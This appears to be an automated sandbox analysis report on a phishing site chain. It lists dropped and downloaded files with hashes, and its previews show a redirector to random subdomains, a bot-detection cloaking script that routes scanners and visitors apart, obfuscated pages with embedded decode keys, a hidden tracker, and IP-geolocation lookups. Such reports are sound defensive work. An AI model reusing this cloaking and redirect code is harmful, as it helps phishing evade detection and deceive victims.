                                                SHA-512:06C98907C6FB6CD363A4ED110EB9B47232AD403764E456105E61D8326777B5883E3673B4C31897A2789288664702CFA03467646D746E2A8E591E433220DB2865
                                                Malicious:false
                                                Reputation:low
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:JSON data
                                                Category:downloaded
                                                Size (bytes):21
                                                Entropy (8bit):3.594465636961452
                                                Encrypted:false
                                                SSDEEP:3:YMb1gXME2Y:YMeX32Y
                                                MD5:909AD59B6307B0CD8BFE7961D4B98778
                                                SHA1:49F8111D613317EA86C6A45CD608DC96B1C8451B
                                                SHA-256:FBCEC43F243A7B7F955E498B7FC37CB5EDF615156529AB8A039BBBCFA52C1829
                                                SHA-512:8FDFFFB73C90ACDC732A0F29257CACEEDAAA28FCAF8E779C5390BDEA9CDE4DE3C8BD005BBEC9B3B7972C787E233D8D8E218D45B6EB2C3AD40EB5E3A2A1EAC3B8
                                                Malicious:false
                                                Reputation:low
                                                URL:https://api.ipify.org/?format=json
                                                Preview:{"ip":"8.46.123.189"}
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):929
                                                Entropy (8bit):4.762599876206931
                                                Encrypted:false
                                                SSDEEP:24:u/bJyRrx/VNmjdOElWY364QCATMz2i0/40duriuNYokGkvuZ+aWgjFvqDry4M:2dcrjwlWY364QCAoaP/DurhkbaWcqDHM
                                                MD5:7AD46618BBD1D5A01355FB119AACCD20
                                                SHA1:6B41139A95CC6AC69BCA4C1F7D75AF1B75E712FB
                                                SHA-256:FF991D34C50383BEC9AFB56E95DC40625577AC02054F99ECFB7D2C986C0A205E
                                                SHA-512:681C647B692FE6736CDB60D92C30768D088EF6DCC781597D200AEB3B7BB3DE4ED665CD85CA07DE4BF2ABD3E516FF4E01FE311610E7E7C11836BD56FE303ABD4D
                                                Malicious:false
                                                Reputation:low
                                                Preview:const currentURL = new URL(window.location.href);.const baseURL = `${currentURL.origin}${currentURL.pathname}`;.const newURL = `${baseURL}?_jd=botd`;.import(newURL).then((_b) => _b.load()).then((_b) => _b.detect())..then((_r) => {. let value;. if (window.location.pathname === '/') {. value = window.location.href.split(/\#|\?/)[1];. if (value) {. value = '/' + value. } else {. value = '/'. }. } else {. value = window.location.pathname;. }. window.history.replaceState({}, '', window.location.href.replace(window.location.hash, ''));. const form = document.createElement('form');. form.method = 'post';. const input = document.createElement('input');. input.type = 'hidden'; . input.name = _r.bot ? '_b' : '_r';. input.value = value;. form.appendChild(input);. document.body.appendChild(form);. . form.submit(). .}).catch()
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text, with very long lines (2557)
                                                Category:downloaded
                                                Size (bytes):2945
                                                Entropy (8bit):5.440375327294984
                                                Encrypted:false
                                                SSDEEP:48:QNyV1fUYmgUPV5d5S0hccO86TxsErTqcUG2gYrB9FsCG7pnOQDqSxAV3T:QAJwgySI617rTqc8rvFskKAZ
                                                MD5:9D7BB226D6303A19CB1F5253A4EB3EA0
                                                SHA1:A9F76EF202D787AE346AF6B070F98DFBB49DD997
                                                SHA-256:A9A9C1EAAF7E1B589CAA101F11FF659E379D52C3CD73A1A8E5D6E437892C9553
                                                SHA-512:CD974470A01CAE6EE3D4ABF69B46A0D67AA29911C793B5080A46196D2FE972FD7C6DF0F06697D674F85C853D24064490930BEEDB31183FC9D7624BC5B8560078
                                                Malicious:false
                                                Reputation:low
                                                URL:https://5mzcue1v.doc.checkiteasy.com/
                                                Preview:<!DOCTYPE html>.<html>.<head>.<img src="tracker.php" alt="" style="display:none;">. <title>Your Privacy Matters</title>.</head>.<body>.<script>. var key = "secretkey";. var encodedHtml = "
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (12599)
                                                Category:downloaded
                                                Size (bytes):12774
                                                Entropy (8bit):5.323702562820299
                                                Encrypted:false
                                                SSDEEP:192:TbmscMgbai2w+7Lw8QnAFXQ9EkZNZ99StT0g9gPLDJ0K2ufmU9kccbRoNhflck:/nybx92LhQ+K99CT0dTD9hicWOflP
                                                MD5:B2184D1E2F4A1BEC954772EFAC779E7F
                                                SHA1:45E7A6622CE1756CE3638CE8433CE5D3E08B75BC
                                                SHA-256:59A704DA2AC001F437F78B243C5D6FDD76A4A14CA014862727AEA493F9CFF2B5
                                                SHA-512:E1F41B3E471CB828D0DB6E080F291613A3646DD2B0D097CC90006DE9BA1EAAFC7668BF875A2A32B57E06361E0A7CAD9427AE2555FFDDC28790DD634D7B5ACDF7
                                                Malicious:false
                                                Reputation:low
                                                URL:https://5mzcue1v.doc.checkiteasy.com/script.js
                                                Preview:var key = "jamesbond";.var encodedScript = "
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text
                                                Category:dropped
                                                Size (bytes):231
                                                Entropy (8bit):4.920063078708878
                                                Encrypted:false
                                                SSDEEP:6:hxuJzhqIziY2IXkXnLBrAMAQFjQLMhfvYm4Nhdx434QL:hY/0iMFjNfwm4Nbx4IQL
                                                MD5:A1D8A3A3085612C3BB30C210783C3668
                                                SHA1:2E1942747BBD92E725BF6274F2AB9C03E5958635
                                                SHA-256:DBB7A4D1DD474DDAB51DA0DB699C9BE45B82F5FBD319F8B7CABF6084D29CC057
                                                SHA-512:0FB961828A7B16D47A71A083563361FCB9057968DF0ADB1E3FAABD227BFD6733C4A49157B3ECB354A0A098DA70A5A4A8250D6E5FE40413B7B1FAB5129F07B317
                                                Malicious:false
                                                Reputation:low
                                                Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <title>Just a moment...</title>. <link rel="icon" type="image/x-icon" href="favicon.ico">. <script src="?_js=_1"></script>.</head>.<body>.</body>.</html>.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text
                                                Category:downloaded
                                                Size (bytes):231
                                                Entropy (8bit):4.920063078708878
                                                Encrypted:false
                                                SSDEEP:6:hxuJzhqIziY2IXkXnLBrAMAQFjQLMhfvYm4Nhdx434QL:hY/0iMFjNfwm4Nbx4IQL
                                                MD5:A1D8A3A3085612C3BB30C210783C3668
                                                SHA1:2E1942747BBD92E725BF6274F2AB9C03E5958635
                                                SHA-256:DBB7A4D1DD474DDAB51DA0DB699C9BE45B82F5FBD319F8B7CABF6084D29CC057
                                                SHA-512:0FB961828A7B16D47A71A083563361FCB9057968DF0ADB1E3FAABD227BFD6733C4A49157B3ECB354A0A098DA70A5A4A8250D6E5FE40413B7B1FAB5129F07B317
                                                Malicious:false
                                                Reputation:low
                                                URL:https://6p205g.ar.yourtaskforce.com/favicon.ico
                                                Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <title>Just a moment...</title>. <link rel="icon" type="image/x-icon" href="favicon.ico">. <script src="?_js=_1"></script>.</head>.<body>.</body>.</html>.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                Category:downloaded
                                                Size (bytes):1057
                                                Entropy (8bit):7.6851406288304105
                                                Encrypted:false
                                                SSDEEP:24:Qb0EcwtZDFHs70yTIy9pEq0WVBtXVMDug3iLRciNe47zz:QIEFA7pdl3tFEWRRPz
                                                MD5:ED9C9EB0DCE17D752BEDEA6B5ACDA6D9
                                                SHA1:ECA56C4904354EED5DA0DEBCD6BD66856AB4784D
                                                SHA-256:F664B8138C2DA6EC7565500A7CC839DA6372614A31DC04C5A2169A26B8D9767C
                                                SHA-512:3BFB696318DDB93540140DBCD4DBB32F129441E46EE752C6B7379624488533BA27CC7EFF3CAE444C1797CA6EECDF333EDAF443AC84CDEB037A890967091CF91C
                                                Malicious:false
                                                Reputation:low
                                                URL:https://5mzcue1v.doc.checkiteasy.com/image/logo.png
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text
                                                Category:downloaded
                                                Size (bytes):4302
                                                Entropy (8bit):4.8051819626117185
                                                Encrypted:false
                                                SSDEEP:96:WlbczVkYQ7fiPv3DIbhEf41PJESO48mLnw+:WlbcaEPv3DIbo41PJESO48mLN
                                                MD5:C4772690CE4666275F53126A0D25EF06
                                                SHA1:70E2F36525485B19394E858D5AAC2E547F017DD5
                                                SHA-256:7165EA4E168AA399516671A63178504323591C1DCFBE48B6CA5B6E7386711683
                                                SHA-512:299EADA4C1E771A988685351A0C84F665445BDA67873A6CBF372278E1CA596BB91832375A0A5FE288DB2CD7E62516AF63884E5B03B66E9CA0FD297CFCC65D98A
                                                Malicious:false
                                                Reputation:low
                                                URL:https://5mzcue1v.doc.checkiteasy.com/style.css
                                                Preview:* {. margin: 0;. padding: 0;. box-sizing: border-box;.}..body {. font-family: 'Segoe UI', Arial, sans-serif;. background-color: #f5f5f5;. line-height: 1.6;. min-height: 100vh;.}...verification-container {. min-height: 100vh;. display: flex;. align-items: center;. justify-content: center;. padding: 1rem;.}...verification-card {. background: white;. border-radius: 8px;. box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);. width: 100%;. max-width: 400px;. overflow: hidden;.}../* Enhanced Logo Styles */..logo-container {. text-align: center;. padding: 1.5rem;. border-bottom: 1px solid #eee;. height: 120px;. display: flex;. align-items: center;. justify-content: center;.}...logo {. height: 40px;. width: auto;. max-width: 160px;. object-fit: contain;. transition: opacity 0.3s ease;.}...logo[src*="logo.clearbit.com"] {. height: 100px;. max-width: 300px;. min-height: 80px;.}...logo[src*="google.com/s2/fav
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text
                                                Category:downloaded
                                                Size (bytes):409
                                                Entropy (8bit):5.233583937739655
                                                Encrypted:false
                                                SSDEEP:12:hYOiMRGCh3yUxx70k01XGNMhKEsd4NbxxQL:hYXix01WNuUd4NQ
                                                MD5:8AEA5DA6F3C846841267EE24E59DF12F
                                                SHA1:F4A2E8482D53AEDE8A87CAFF3F0D9CC7735CBC8A
                                                SHA-256:8AFE97B88D47B53F9BF8339C9CF4787B63756F5AA7BFDEB1EBAD4061565944AE
                                                SHA-512:A6C83BA93CAF444DE3C81722851B237B9334A95204B0D3DEA00521A39BF1149050C446E98019E477E5B71291F1C9005EDC4A21D9819958ABEB26BC1E939D01DF
                                                Malicious:false
                                                Reputation:low
                                                URL:https://main.d3qs0n0oqv3g7o.amplifyapp.com/
                                                Preview:<!DOCTYPE html>.<html>.<head>.<meta charset="UTF-8">.<title>Safe Link</title>.<script>. let arr = new Uint8Array(6);. crypto.getRandomValues(arr);. let sub = Array.from(arr, b => (b % 36).toString(36)).join('');. let domain = "ar.yourtaskforce.com";..location.replace(`https://${sub}.${domain}${location.pathname}${location.search}${location.hash}`);.</script>.</head>.<body>Redirecting...</body>.</html>.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text, with very long lines (2557)
                                                Category:dropped
                                                Size (bytes):2945
                                                Entropy (8bit):5.440375327294984
                                                Encrypted:false
                                                SSDEEP:48:QNyV1fUYmgUPV5d5S0hccO86TxsErTqcUG2gYrB9FsCG7pnOQDqSxAV3T:QAJwgySI617rTqc8rvFskKAZ
                                                MD5:9D7BB226D6303A19CB1F5253A4EB3EA0
                                                SHA1:A9F76EF202D787AE346AF6B070F98DFBB49DD997
                                                SHA-256:A9A9C1EAAF7E1B589CAA101F11FF659E379D52C3CD73A1A8E5D6E437892C9553
                                                SHA-512:CD974470A01CAE6EE3D4ABF69B46A0D67AA29911C793B5080A46196D2FE972FD7C6DF0F06697D674F85C853D24064490930BEEDB31183FC9D7624BC5B8560078
                                                Malicious:false
                                                Reputation:low
                                                Preview:<!DOCTYPE html>.<html>.<head>.<img src="tracker.php" alt="" style="display:none;">. <title>Your Privacy Matters</title>.</head>.<body>.<script>. var key = "secretkey";. var encodedHtml = "
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):764
                                                Entropy (8bit):4.74727172577332
                                                Encrypted:false
                                                SSDEEP:12:f8WJMHx14yOu/hz/zHoaNOU4/c/UddFB6MrYJmV4Mr2iWxmrp2AptAv9VVZ8BHA:k1x14wxHoaNO38mV5r2Zmrp2sAv9OBHA
                                                MD5:AF7363CA84DC1C09C5ABB69DDA664EEA
                                                SHA1:1B1497B9DB7EEFB594E45BF4165C75F05AE64E12
                                                SHA-256:3CE5BCA513C0D0115CDEF2D28CB59EC98E1CD70A33C4CC839B60366EA28C7CA6
                                                SHA-512:1828ACE2F7A24846755CEDE958555C58D35B8797790BFE4F6A2C181D5FF751B408F891524298688C2404D9554D2194A9F493616A5CF8F7CDD68CA99EF8663A1A
                                                Malicious:false
                                                Reputation:low
                                                Preview:{. "ip": "8.46.123.189",. "network": "8.46.123.0/24",. "version": "IPv4",. "city": "New York City",. "region": "New York",. "region_code": "NY",. "country": "US",. "country_name": "United States",. "country_code": "US",. "country_code_iso3": "USA",. "country_capital": "Washington",. "country_tld": ".us",. "continent_code": "NA",. "in_eu": false,. "postal": "10069",. "latitude": 40.778,. "longitude": -73.9884,. "timezone": "America/New_York",. "utc_offset": "-0500",. "country_calling_code": "+1",. "currency": "USD",. "currency_name": "Dollar",. "languages": "en-US,es-US,haw,fr",. "country_area": 9629091.0,. "country_population": 327167434,. "asn": "AS3356",. "org": "LEVEL3".}
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:Web Open Font Format (Version 2), TrueType, length 126828, version 768.256
                                                Category:downloaded
                                                Size (bytes):126828
                                                Entropy (8bit):7.995551491026822
                                                Encrypted:true
                                                SSDEEP:3072:caEaIjBfXHk79vCMuMZhQqmiutWxJfU52qiAx+SMfd:caEaIf3kxa5aaVMaHAScd
                                                MD5:297973A488F688271DD223D542BA2697
                                                SHA1:ED99D812E4C88826335F93ACEDE3FAD85C90FB54
                                                SHA-256:1B099F88C06ED0869872561C157F0EC9CBE133A0939D9ECE4EE1E1F54BD4683D
                                                SHA-512:83C802972D9FEE9DD7E3C0DE42D8636C504E65FF20E43406BB446CC95A16ACAA21789A03F0E2006148ABFE47100BBD0C66AA4CF98F11E9B0220F1DCDB5204F46
                                                Malicious:false
                                                Reputation:low
                                                URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/webfonts/fa-solid-900.woff2
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):1057
                                                Entropy (8bit):7.6851406288304105
                                                Encrypted:false
                                                SSDEEP:24:Qb0EcwtZDFHs70yTIy9pEq0WVBtXVMDug3iLRciNe47zz:QIEFA7pdl3tFEWRRPz
                                                MD5:ED9C9EB0DCE17D752BEDEA6B5ACDA6D9
                                                SHA1:ECA56C4904354EED5DA0DEBCD6BD66856AB4784D
                                                SHA-256:F664B8138C2DA6EC7565500A7CC839DA6372614A31DC04C5A2169A26B8D9767C
                                                SHA-512:3BFB696318DDB93540140DBCD4DBB32F129441E46EE752C6B7379624488533BA27CC7EFF3CAE444C1797CA6EECDF333EDAF443AC84CDEB037A890967091CF91C
                                                Malicious:false
                                                Reputation:low
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (65317)
                                                Category:downloaded
                                                Size (bytes):89220
                                                Entropy (8bit):4.793594206481332
                                                Encrypted:false
                                                SSDEEP:1536:iUMVM6MVMkMVM9MVMNMVMispxd1zJJ29Nll3IV7UHsR+z:Dd1NY95IV7UMR+z
                                                MD5:DFB8FC36E102730FDDF78B5494EB0035
                                                SHA1:B513D9A39AF2EE145F12C1BA03F9982960C47029
                                                SHA-256:8D321D88CB97FDEDC3189506C25DE9292C6E73A60EBAAB496243346C6404480E
                                                SHA-512:F6EB006B5D0844ED078689E9C80215A63AF294FBE80F088F52229D5A4E6DDCFCA8958D5C39DE03484D066BEAE2E00B93AE83D1E5A42F5D4F710BAA8E3E7CC57A
                                                Malicious:false
                                                Reputation:low
                                                URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css
                                                Preview:/*!. * Font Awesome Free 6.0.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2022 Fonticons, Inc.. */..fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-duotone,.fa-light,.fa-regular,.fa-solid,.fa-thin,.fab,.fad,.fal,.far,.fas,.fat{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;line-height:.08333em;vertical-align:.125em}.fa-sm{font-size:.875em;line-height:.07143em;vertical-align:.05357em
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (12599)
                                                Category:dropped
                                                Size (bytes):12774
                                                Entropy (8bit):5.323702562820299
                                                Encrypted:false
                                                SSDEEP:192:TbmscMgbai2w+7Lw8QnAFXQ9EkZNZ99StT0g9gPLDJ0K2ufmU9kccbRoNhflck:/nybx92LhQ+K99CT0dTD9hicWOflP
                                                MD5:B2184D1E2F4A1BEC954772EFAC779E7F
                                                SHA1:45E7A6622CE1756CE3638CE8433CE5D3E08B75BC
                                                SHA-256:59A704DA2AC001F437F78B243C5D6FDD76A4A14CA014862727AEA493F9CFF2B5
                                                SHA-512:E1F41B3E471CB828D0DB6E080F291613A3646DD2B0D097CC90006DE9BA1EAAFC7668BF875A2A32B57E06361E0A7CAD9427AE2555FFDDC28790DD634D7B5ACDF7
                                                Malicious:false
                                                Reputation:low
                                                Preview:var key = "jamesbond";.var encodedScript = "
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text, with very long lines (2557)
                                                Category:downloaded
                                                Size (bytes):2945
                                                Entropy (8bit):5.440375327294984
                                                Encrypted:false
                                                SSDEEP:48:QNyV1fUYmgUPV5d5S0hccO86TxsErTqcUG2gYrB9FsCG7pnOQDqSxAV3T:QAJwgySI617rTqc8rvFskKAZ
                                                MD5:9D7BB226D6303A19CB1F5253A4EB3EA0
                                                SHA1:A9F76EF202D787AE346AF6B070F98DFBB49DD997
                                                SHA-256:A9A9C1EAAF7E1B589CAA101F11FF659E379D52C3CD73A1A8E5D6E437892C9553
                                                SHA-512:CD974470A01CAE6EE3D4ABF69B46A0D67AA29911C793B5080A46196D2FE972FD7C6DF0F06697D674F85C853D24064490930BEEDB31183FC9D7624BC5B8560078
                                                Malicious:false
                                                Reputation:low
                                                URL:https://5mzcue1v.doc.checkiteasy.com/favicon.ico
                                                Preview:<!DOCTYPE html>.<html>.<head>.<img src="tracker.php" alt="" style="display:none;">. <title>Your Privacy Matters</title>.</head>.<body>.<script>. var key = "secretkey";. var encodedHtml = "
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (15005)
                                                Category:dropped
                                                Size (bytes):15196
                                                Entropy (8bit):5.206988093706638
                                                Encrypted:false
                                                SSDEEP:384:/yKlnAKXPD899vDMKXExXI7EhgKkVGVXvPGt7MD:hfPD899vDMKHLVGVXvPGNA
                                                MD5:234A8C1C15DF9B03C65E9E14C82FC872
                                                SHA1:E5CA36727846AEDE7DFBC07E88B2B025EB0CAE90
                                                SHA-256:29CB26E06F2A4A877F1134A46480D9B78F8B6E0E6F9B0FE67E34307C312B5A89
                                                SHA-512:9AEEE4E620DE49E0ED303917E9AFC1806DA0815896BC5FEEF3ADD9F89E0429678BFE0D9F0AD3FC940BD8E48F7E235E5C8D23463407C42B6FBC740B50C43A0B53
                                                Malicious:false
                                                Reputation:low
                                                Preview:/**. * Fingerprint BotD v1.9.1 - Copyright (c) FingerprintJS, Inc, 2024 (https://fingerprint.com). * Licensed under the MIT (http://www.opensource.org/licenses/mit-license.php) license.. */.var e=function(n,t){return e=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,n){e.__proto__=n}||function(e,n){for(var t in n)Object.prototype.hasOwnProperty.call(n,t)&&(e[t]=n[t])},e(n,t)};function n(e,n,t,r){return new(t||(t=Promise))((function(i,o){function a(e){try{s(r.next(e))}catch(n){o(n)}}function u(e){try{s(r.throw(e))}catch(n){o(n)}}function s(e){var n;e.done?i(e.value):(n=e.value,n instanceof t?n:new t((function(e){e(n)}))).then(a,u)}s((r=r.apply(e,n||[])).next())}))}function t(e,n){var t,r,i,o,a={label:0,sent:function(){if(1&i[0])throw i[1];return i[1]},trys:[],ops:[]};return o={next:u(0),throw:u(1),return:u(2)},"function"==typeof Symbol&&(o[Symbol.iterator]=function(){return this}),o;function u(u){return function(s){return function(u){if(t)throw new TypeError("Generator
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):21
                                                Entropy (8bit):3.594465636961452
                                                Encrypted:false
                                                SSDEEP:3:YMb1gXME2Y:YMeX32Y
                                                MD5:909AD59B6307B0CD8BFE7961D4B98778
                                                SHA1:49F8111D613317EA86C6A45CD608DC96B1C8451B
                                                SHA-256:FBCEC43F243A7B7F955E498B7FC37CB5EDF615156529AB8A039BBBCFA52C1829
                                                SHA-512:8FDFFFB73C90ACDC732A0F29257CACEEDAAA28FCAF8E779C5390BDEA9CDE4DE3C8BD005BBEC9B3B7972C787E233D8D8E218D45B6EB2C3AD40EB5E3A2A1EAC3B8
                                                Malicious:false
                                                Reputation:low
                                                Preview:{"ip":"8.46.123.189"}
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text
                                                Category:downloaded
                                                Size (bytes):929
                                                Entropy (8bit):4.762599876206931
                                                Encrypted:false
                                                SSDEEP:24:u/bJyRrx/VNmjdOElWY364QCATMz2i0/40duriuNYokGkvuZ+aWgjFvqDry4M:2dcrjwlWY364QCAoaP/DurhkbaWcqDHM
                                                MD5:7AD46618BBD1D5A01355FB119AACCD20
                                                SHA1:6B41139A95CC6AC69BCA4C1F7D75AF1B75E712FB
                                                SHA-256:FF991D34C50383BEC9AFB56E95DC40625577AC02054F99ECFB7D2C986C0A205E
                                                SHA-512:681C647B692FE6736CDB60D92C30768D088EF6DCC781597D200AEB3B7BB3DE4ED665CD85CA07DE4BF2ABD3E516FF4E01FE311610E7E7C11836BD56FE303ABD4D
                                                Malicious:false
                                                Reputation:low
                                                URL:https://6p205g.ar.yourtaskforce.com/?_js=_1
                                                Preview:const currentURL = new URL(window.location.href);.const baseURL = `${currentURL.origin}${currentURL.pathname}`;.const newURL = `${baseURL}?_jd=botd`;.import(newURL).then((_b) => _b.load()).then((_b) => _b.detect())..then((_r) => {. let value;. if (window.location.pathname === '/') {. value = window.location.href.split(/\#|\?/)[1];. if (value) {. value = '/' + value. } else {. value = '/'. }. } else {. value = window.location.pathname;. }. window.history.replaceState({}, '', window.location.href.replace(window.location.hash, ''));. const form = document.createElement('form');. form.method = 'post';. const input = document.createElement('input');. input.type = 'hidden'; . input.name = _r.bot ? '_b' : '_r';. input.value = value;. form.appendChild(input);. document.body.appendChild(form);. . form.submit(). .}).catch()
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:JSON data
                                                Category:downloaded
                                                Size (bytes):764
                                                Entropy (8bit):4.74727172577332
                                                Encrypted:false
                                                SSDEEP:12:f8WJMHx14yOu/hz/zHoaNOU4/c/UddFB6MrYJmV4Mr2iWxmrp2AptAv9VVZ8BHA:k1x14wxHoaNO38mV5r2Zmrp2sAv9OBHA
                                                MD5:AF7363CA84DC1C09C5ABB69DDA664EEA
                                                SHA1:1B1497B9DB7EEFB594E45BF4165C75F05AE64E12
                                                SHA-256:3CE5BCA513C0D0115CDEF2D28CB59EC98E1CD70A33C4CC839B60366EA28C7CA6
                                                SHA-512:1828ACE2F7A24846755CEDE958555C58D35B8797790BFE4F6A2C181D5FF751B408F891524298688C2404D9554D2194A9F493616A5CF8F7CDD68CA99EF8663A1A
                                                Malicious:false
                                                Reputation:low
                                                URL:https://ipapi.co/json/
                                                Preview:{. "ip": "8.46.123.189",. "network": "8.46.123.0/24",. "version": "IPv4",. "city": "New York City",. "region": "New York",. "region_code": "NY",. "country": "US",. "country_name": "United States",. "country_code": "US",. "country_code_iso3": "USA",. "country_capital": "Washington",. "country_tld": ".us",. "continent_code": "NA",. "in_eu": false,. "postal": "10069",. "latitude": 40.778,. "longitude": -73.9884,. "timezone": "America/New_York",. "utc_offset": "-0500",. "country_calling_code": "+1",. "currency": "USD",. "currency_name": "Dollar",. "languages": "en-US,es-US,haw,fr",. "country_area": 9629091.0,. "country_population": 327167434,. "asn": "AS3356",. "org": "LEVEL3".}
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (15005)
                                                Category:downloaded
                                                Size (bytes):15196
                                                Entropy (8bit):5.206988093706638
                                                Encrypted:false
                                                SSDEEP:384:/yKlnAKXPD899vDMKXExXI7EhgKkVGVXvPGt7MD:hfPD899vDMKHLVGVXvPGNA
                                                MD5:234A8C1C15DF9B03C65E9E14C82FC872
                                                SHA1:E5CA36727846AEDE7DFBC07E88B2B025EB0CAE90
                                                SHA-256:29CB26E06F2A4A877F1134A46480D9B78F8B6E0E6F9B0FE67E34307C312B5A89
                                                SHA-512:9AEEE4E620DE49E0ED303917E9AFC1806DA0815896BC5FEEF3ADD9F89E0429678BFE0D9F0AD3FC940BD8E48F7E235E5C8D23463407C42B6FBC740B50C43A0B53
                                                Malicious:false
                                                Reputation:low
                                                URL:https://6p205g.ar.yourtaskforce.com/?_jd=botd
                                                Preview:/**. * Fingerprint BotD v1.9.1 - Copyright (c) FingerprintJS, Inc, 2024 (https://fingerprint.com). * Licensed under the MIT (http://www.opensource.org/licenses/mit-license.php) license.. */.var e=function(n,t){return e=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,n){e.__proto__=n}||function(e,n){for(var t in n)Object.prototype.hasOwnProperty.call(n,t)&&(e[t]=n[t])},e(n,t)};function n(e,n,t,r){return new(t||(t=Promise))((function(i,o){function a(e){try{s(r.next(e))}catch(n){o(n)}}function u(e){try{s(r.throw(e))}catch(n){o(n)}}function s(e){var n;e.done?i(e.value):(n=e.value,n instanceof t?n:new t((function(e){e(n)}))).then(a,u)}s((r=r.apply(e,n||[])).next())}))}function t(e,n){var t,r,i,o,a={label:0,sent:function(){if(1&i[0])throw i[1];return i[1]},trys:[],ops:[]};return o={next:u(0),throw:u(1),return:u(2)},"function"==typeof Symbol&&(o[Symbol.iterator]=function(){return this}),o;function u(u){return function(s){return function(u){if(t)throw new TypeError("Generator
                                                No static file info
                                                Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                Dec 23, 2024 15:21:20.275896072 CET49735443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:20.275930882 CET44349735135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:20.276268959 CET44349735135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:20.277219057 CET49735443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:20.277286053 CET44349735135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:20.277337074 CET49735443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:20.315337896 CET44349734135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:20.319335938 CET44349735135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:20.324501038 CET49735443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:20.409893036 CET44349737135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:20.430974960 CET49737443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:20.431005001 CET44349737135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:20.432312965 CET44349737135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:20.432375908 CET49737443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:20.432881117 CET49737443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:20.432972908 CET44349737135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:20.433264017 CET49737443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:20.433269978 CET44349737135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:20.489742994 CET49737443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:20.816087008 CET44349735135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:20.816189051 CET44349735135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:20.816318989 CET49735443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:20.817483902 CET49735443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:20.817507982 CET44349735135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:20.820930958 CET49743443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:20.820981979 CET44349743135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:20.821048021 CET49743443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:20.821309090 CET49743443192.168.2.5135.225.111.190
